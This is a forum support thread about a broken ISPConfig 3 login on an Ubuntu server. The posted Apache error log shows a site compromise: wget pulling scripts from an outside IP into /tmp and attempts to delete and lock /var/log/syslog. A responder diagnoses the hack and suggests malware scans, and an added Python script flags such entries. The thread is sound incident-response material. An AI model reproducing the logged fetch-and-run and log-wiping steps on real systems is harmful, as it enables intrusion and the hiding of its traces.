Hey guys, I've got ISPConfig 3 running on Ubuntu 9.04. It's been great for quite some time. However, for some reason I no longer have boxes available to log into the admin page. The login page comes up with the usual look, just no place to enter admin credentials. I'm sure it is something I did but I am stumped. Any ideas? Thanks in advance for any help.
Take a look at the Apache error.log. Maybe you changed some php.ini settings that prevent ISPConfig from working.
error.log

Till, Thanks for the response. Following is my Apache2 error.log file. I don't know what I'm looking at but the one thing that sticks out is the repeated connections to 221.132.37.26:80. This is not my IP address. Neither is 54.246.4.70. Does anything else look out of place? If this is something I should not post here, please let me know.

[Sun Mar 02 06:50:21 2014] [notice] Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8g configured -- resuming normal operations
[Sun Mar 02 06:50:21 2014] [warn] long lost child came home! (pid 14375)
[Sun Mar 02 06:50:21 2014] [notice] mod_fcgid: call /var/www/linkplazas.info/web/index.php with wrapper /var/www/php-fcgi-scripts/web10/.php-fcgi-starter
[Sun Mar 02 06:50:43 2014] [notice] mod_fcgid: call /var/www/linkplazas.info/web/index.php with wrapper /var/www/php-fcgi-scripts/web10/.php-fcgi-starter
[Sun Mar 02 06:55:17 2014] [notice] mod_fcgid: call /var/www/goodcarinsurance.net/web/compare-car-insurance-rate.php with wrapper /var/www/php-fcgi-scripts/web15/.php-fcgi-starter
[Sun Mar 02 07:10:16 2014] [error] [client 130.185.109.239] File does not exist: /var/www/robots.txt
[Sun Mar 02 07:26:31 2014] [notice] mod_fcgid: call /var/www/rockwalldata.com/web/index.php with wrapper /var/www/php-fcgi-scripts/web23/.php-fcgi-starter
[Sun Mar 02 08:18:01 2014] [notice] mod_fcgid: call /var/www/lakesideambucs.org/web/index.php with wrapper /var/www/php-fcgi-scripts/web29/.php-fcgi-starter
[Sun Mar 02 09:14:34 2014] [error] [client 37.9.53.129] File does not exist: /var/www/administrator
[Sun Mar 02 09:28:47 2014] [error] [client 66.249.79.82] File does not exist: /var/www/robots.txt
[Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] --2014-03-02 09:36:45-- http://221.132.37.26/sh
[Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] Connecting to 221.132.37.26:80...
[Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] connected.
[Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] HTTP request sent, awaiting response...
[Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] 200 OK
[Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] Length: 1069 (1.0K) [text/plain]
[Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] Saving to: `/tmp/sh'
[Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70]
[Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] 0K . 100% 103M=0s
[Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70]
[Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] 2014-03-02 09:36:45 (103 MB/s) - `/tmp/sh' saved [1069/1069]
[Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70]
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] rm:
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] cannot remove `/var/log/syslog'
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] : Permission denied
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70]
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] touch:
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] cannot touch `/var/log/syslog'
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] : Permission denied
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70]
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] chmod:
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] changing permissions of `/var/log/syslog'
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] : Operation not permitted
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70]
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] chattr: Permission denied
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] while reading flags on /var/log/syslog\r
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] --2014-03-02 09:36:48-- http://221.132.37.26/ru
[Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] Connecting to 221.132.37.26:80...
[Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] connected.
[Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] HTTP request sent, awaiting response...
[Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] 200 OK
[Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] Length: 944 [text/plain]
[Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] Saving to: `ru'
[Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70]
[Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] 0K 100% 84.9M=0s
[Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70]
[Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] 2014-03-02 09:36:49 (84.9 MB/s) - `ru' saved [944/944]
[Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70]
[Sun Mar 02 09:36:50 2014] [error] [client 54.246.4.70] --2014-03-02 09:36:50-- http://221.132.37.26/rr
[Sun Mar 02 09:36:50 2014] [error] [client 54.246.4.70] Connecting to 221.132.37.26:80...
[Sun Mar 02 09:36:50 2014] [error] [client 54.246.4.70] connected.
According to the log, just a website is hacked. So it might not be necessary to reinstall the whole server. Check the /tmp directory for unusual files and post the output of ls -la /tmp to see which user owns these files. Then you should scan the server with rkhunter and maldetect: http://www.howtoforge.com/forums/showpost.php?p=286287&postcount=9
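An added example, not part of the original thread: the wget progress lines and the rm/touch/chmod/chattr errors in the log above are stderr from shell commands started by a web process, which Apache records in error.log under the requesting client. The Python script below flags such entries per client IP; the function name, sample entries and IP addresses are constructed for illustration.

```python
import re
from collections import defaultdict

# Apache 2.2 error.log entry that carries a client address.
ENTRY = re.compile(r"\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>[^\]]+)\] (?P<msg>.*)")
# wget writes "--<date> <time>-- <url>" and "Saving to: `<path>'" to stderr.
WGET_URL = re.compile(r"^--\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}--\s+(?P<url>\S+)")
WGET_SAVE = re.compile(r"^Saving to: [`'](?P<path>[^']+)'")
# "<tool>:" error prefixes; the tool list is taken from the log in this thread.
TOOL_ERR = re.compile(r"^(?P<tool>rm|touch|chmod|chattr):")


def find_command_output(lines):
    """Return {client_ip: evidence} for entries that look like shell-tool stderr."""
    hits = defaultdict(lambda: {"first_seen": None, "urls": [], "saved": [], "tools": []})
    for line in lines:
        entry = ENTRY.search(line)
        if not entry:
            continue  # [notice]/[warn] lines and entries without a client
        msg = entry.group("msg").strip()
        url, saved, tool = WGET_URL.match(msg), WGET_SAVE.match(msg), TOOL_ERR.match(msg)
        if not (url or saved or tool):
            continue  # ordinary error such as "File does not exist"
        rec = hits[entry.group("ip")]
        rec["first_seen"] = rec["first_seen"] or entry.group("ts")
        if url:
            rec["urls"].append(url.group("url"))
        if saved:
            rec["saved"].append(saved.group("path"))
        if tool and tool.group("tool") not in rec["tools"]:
            rec["tools"].append(tool.group("tool"))
    return dict(hits)


# Constructed sample in the same format as the log above (documentation-range IPs).
SAMPLE_LOG = """
[Sun Mar 02 07:10:16 2014] [error] [client 192.0.2.10] File does not exist: /var/www/robots.txt
[Sun Mar 02 09:36:45 2014] [error] [client 198.51.100.7] --2014-03-02 09:36:45--  http://203.0.113.5/sh
[Sun Mar 02 09:36:45 2014] [error] [client 198.51.100.7] Connecting to 203.0.113.5:80...
[Sun Mar 02 09:36:45 2014] [error] [client 198.51.100.7] Saving to: `/tmp/sh'
[Sun Mar 02 09:36:48 2014] [error] [client 198.51.100.7] rm:
[Sun Mar 02 09:36:48 2014] [error] [client 198.51.100.7] cannot remove `/var/log/syslog'
[Sun Mar 02 09:36:48 2014] [error] [client 198.51.100.7] chattr: Permission denied
[Sun Mar 02 09:50:00 2014] [notice] mod_fcgid: call /var/www/example.test/web/index.php
"""

if __name__ == "__main__":
    for ip, rec in find_command_output(SAMPLE_LOG.splitlines()).items():
        print(ip, rec)
```

A CGI or FastCGI script can also write to stderr legitimately, so treat each hit as a lead to check against the access log and the timestamps of the saved files.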
Thanks, Till. Here is the ls -la /tmp:

total 80
drwxrwxrwx 4 root root 65536 2014-03-17 21:35 .
drwxr-xr-x 22 root root 4096 2014-03-17 18:39 ..
drwxrwxrwt 2 root root 4096 2014-03-17 18:39 .ICE-unix
drwxrwxrwt 2 root root 4096 2014-03-17 18:39 .X11-unix

I ran maldetect and it found and quarantined 5 items. This may have fixed my issues but I don't know since I still do not have login boxes for the ISPConfig admin page. So I can't log in. I installed RKHunter but it would not run. User error I'm sure. I get the following error:

'Invalid SCRIPTWHITELIST configuration option: Non-existent pathname: /usr/sbin/prelink'

Very grateful for any and all help.
DNS issues?

In the interest of full disclosure, here are some more symptoms that could be entirely unrelated.

1) I recently was forced to switch ISPs. I am now on AT&T.
2) When the server is plugged in I seem to have basic surfing issues with other computers in my network.
3) The issues seem to be DNS related. Websites become slow to respond and there seems to be trouble "resolving host".

Could the server be overriding DNS calls or something? I feel I could investigate more if I could just log in to ISPConfig. Thanks again.